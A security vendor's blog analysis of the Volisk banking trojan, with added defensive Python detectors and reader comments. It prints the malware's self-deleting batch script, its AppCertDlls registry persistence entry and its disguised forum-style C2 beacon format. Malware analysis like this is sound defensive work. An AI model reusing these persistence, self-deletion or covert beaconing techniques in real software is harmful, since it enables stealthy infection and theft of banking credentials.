Anatomy of a Trojan: TrojWare.Win32.TrojanSpy.Volisk.a

November 13, 2012 | By Igor

As part of Comodo Labs’ ongoing analysis of “digitally signed” (carrying a signature that confirms the software author and guarantees the program code hasn’t been altered or corrupted since being signed) “malware” (software used or created to disrupt computer operation, gather sensitive information, or gain access to computer systems), we recently discovered a new sample which uses an interesting and potentially devastating combination of techniques to deliver its “payload” (the cargo of a data transmission).

Starting with a digitally signed “dropper” (installation program), the malware was able to inject itself into Windows “processes” (instances of computer programs being executed); bypass the “firewall” (protects against threats from the public Internet) and “host intrusion protection mechanisms” (monitor a single computer for suspicious activity by analyzing events occurring within that computer); send user details to a control “server” (computer hardware dedicated to running one or more services); download additional “configuration files” (configure initial settings for some computer programs); and finally direct its victims to “phishing” websites (designed to look like other websites in an attempt to steal users’ personal information) which request the user’s banking usernames and passwords. This document contains a detailed description of our observations.

The dropper (installer) component of the malware was digitally signed with a certificate issued by a trusted Certificate Authority. Because the installer was ‘trusted’, it was able to evade the heuristic detection and Host Intrusion Protection Systems (HIPS) of many popular Antivirus and Internet Security programs.


Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.


The file name of this main module is generated by concatenating two name fragments taken from two random “*.exe” (Windows executable) files in the Windows system folder. For example, “diskpart.exe” (Windows text-mode command interpreter) and “eventvwr.exe” (Microsoft Event Viewer) generate the file name “disktvwr.dll”.

The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).


It is configured for automatic injection into most operating system processes and user applications via a randomly named value of an obscure Windows Registry key (similar to a folder):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"


As a result, the function “CreateProcessNotify”, exported by the malware “module” (a portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is called at the creation of each new process. This causes the malware DLL to be injected into most operating system processes and user applications.
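An added example, not taken from the original article, of how a defender can audit for this persistence mechanism: it parses a .reg-style export of the AppCertDlls key and applies the spliced-name heuristic described above to each registered DLL. The registry text and the list of system executables are constructed for the example; a real audit would read the live key and list the system folder.

```python
import re
from typing import Dict, List

# Constructed sample: a .reg export of the AppCertDlls key as the article shows it,
# plus an unrelated key that the audit must ignore.
SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Unrelated]
"Path"="C:\\Program Files\\Example\\example.dll"
"""
# Constructed subset of the executables in a Windows system folder; a real audit
# would list the folder itself rather than use a fixed list.
SYSTEM_EXES = ["diskpart.exe", "eventvwr.exe", "notepad.exe", "calc.exe", "cmd.exe"]
APPCERT_KEY = r"\Control\Session Manager\AppCertDlls"

def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the REG_SZ values of a .reg export into {key path: {value name: data}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'"([^"]+)"="(.*)"$', line)
            if m:  # .reg files double every backslash; undo that for the path
                keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys

def appcert_dlls(text: str) -> List[str]:
    """Every DLL registered under AppCertDlls; Windows loads each into new processes."""
    return [path for key, values in parse_reg(text).items()
            if key.lower().endswith(APPCERT_KEY.lower()) for path in values.values()]

def spliced_from_exes(dll_path: str, exes: List[str]) -> bool:
    """Heuristic for the naming trick: the DLL base name is the start of one system
    .exe name joined to the end of a different one (disk|part + event|tvwr)."""
    base = dll_path.rsplit("\\", 1)[-1].lower().removesuffix(".dll")
    stems = [e.lower().removesuffix(".exe") for e in exes]
    for i in range(2, len(base) - 1):  # at least two characters from each side
        head, tail = base[:i], base[i:]
        heads = {s for s in stems if s.startswith(head)}
        tails = {s for s in stems if s.endswith(tail)}
        if any(h != t for h in heads for t in tails):
            return True
    return False
```

Any value under AppCertDlls deserves review on its own, since legitimate software rarely populates the key; the name heuristic only adds confidence.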

After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:

1342562.bat:
attrib -s -r -h %1
:hkiflg
del %1
if exist %1 goto hkiflg
del %0


The main module is injected into the “explorer.exe” process and acts as a server application. It opens a named “pipe” (a temporary software connection between two programs or commands) whose name is a 128-bit Unique ID (UID), for example “\\.\pipe\{b2459e76-035d-2d18-0a97-debbcce1c0a5}”, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via the named pipe.


Modules injected into the “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser applications are used for communication with the remote control server. This tricks firewall and HIPS technology by making network activity generated by the malware appear to have been initiated by the user. The current version of the malware does not support other browsers like “chrome.exe” (Google Chrome), “opera.exe” (Opera) and “safari.exe” (Apple Safari). To circumvent this limitation, it prevents these browsers from opening and forces the user to use one of the supported browsers instead. The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” (a request method asking the web server to accept, for storage, the data enclosed in the request message’s body) using a “URL” (Uniform Resource Locator, the global address of a web page on the World Wide Web) of the following format:

http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c


…with the request body containing basic information about the user’s system and the installed malware module:

“user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&
win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin”
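An added example (not part of the original article) of detection logic over constructed proxy records: a request is flagged as the beacon described above when it shares at least two of its traits, namely the POST to viewtopic.php, the non-standard sid5 parameter, the system-profile body fields and a server reached by bare IP address. The 192.0.2.10 address is a placeholder for the article’s *.*.*.*, and the benign forum requests are constructed for contrast.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Body field names the article shows in the first beacon sent to the control server.
BEACON_KEYS = {"user_id", "version_id", "socks", "build", "crc", "win", "arch", "user"}

def classify_request(method: str, url: str, body: str) -> List[str]:
    """Return the traits a request shares with the Volisk beacon (empty list = none)."""
    reasons: List[str] = []
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if method.upper() == "POST" and parts.path.endswith("/viewtopic.php"):
        reasons.append("POST to viewtopic.php (reading a forum topic is a GET)")
    if re.fullmatch(r"[0-9a-fA-F]{32}", query.get("sid5", [""])[0]):
        reasons.append("non-standard 'sid5' parameter carrying a 32-hex-digit value")
    if len(BEACON_KEYS & set(parse_qs(body, keep_blank_values=True))) >= 6:
        reasons.append("body carries the beacon's system-profile fields")
    if parts.hostname and re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", parts.hostname):
        reasons.append("forum reached by bare IP address instead of a host name")
    return reasons

# Constructed sample traffic: the beacon as the article documents it (192.0.2.10 is a
# TEST-NET placeholder for the article's *.*.*.*) next to two benign forum requests.
SAMPLE_TRAFFIC = [
    ("POST",
     "http://192.0.2.10/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c",
     "user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&"
     "win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin"),
    ("GET",
     "http://forum.example.org/viewtopic.php?f=159&t=17216&sid=c0dcd0254daef45e27b86c3b5995a14c",
     ""),
    ("POST", "http://forum.example.org/posting.php?mode=reply&t=17216",
     "subject=Re%3A+hello&message=hello+again"),
]

def scan(traffic) -> List[Tuple[str, List[str]]]:
    """Report (url, reasons) for each request that matches at least two traits."""
    hits: List[Tuple[str, List[str]]] = []
    for method, url, body in traffic:
        reasons = classify_request(method, url, body)
        if len(reasons) >= 2:
            hits.append((url, reasons))
    return hits

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_TRAFFIC):
        print(url, "->", "; ".join(reasons))
```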


It then receives an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named with a 128-bit UID, in the same way as the named pipe:

[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
...


The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:


Once a user accesses one of the monitored URLs, the malware generates a phishing page which asks the user to enter their account details (including user name, password and credit card number) under the pretense of either recovering their account password or enabling additional security measures:

(Screenshot: “Security System” phishing page)

File information:

Dropper EXE:
Size: 285264
SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x86 DLL:
Size: 88576
SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x64 DLL:
Size: 98304
SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f
Signature: TrojWare.Win32.TrojanSpy.Volisk.a


Diagnosis, Removal & Protection Instructions

If your computer doesn’t have an Antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):

1. Download Comodo Antivirus and perform a full scan with an up-to-date antivirus database.
2. Remove the malware found by choosing from the recommended options, and stay protected.


    Comments

    Zen Network Technologies January 10, 2013 at 3:08 pm

    Viruses and trojans are becoming advanced. It has to be a pain for the antivirus companies such as Symantec and McAfee. This is happening to internet security: DDoS attacks are using advanced techniques to find new exploits and hide themselves. Great in-depth article. Keep them coming, Igor.

    kelly April 26, 2013 at 9:28 am

    I have gone through the Comodo antivirus link. It’s a complete package for the security of our computer system. Are you offering any discount?

    elms January 24, 2014 at 2:47 pm

    Well, Comodo is my best, but I’ve noticed that it will not detect a virus (.exe) even when I know it is a virus. What makes it good are the other security features. Otherwise, it’s like all the antiviruses out there.

      Kevin Judge January 29, 2014 at 8:53 pm

      You may be a little confused. If a file is not determined to be a virus but is not verified as safe, it will run in a safe, secure area called the sandbox.
      If, as you say, it is a virus, it cannot harm your system.
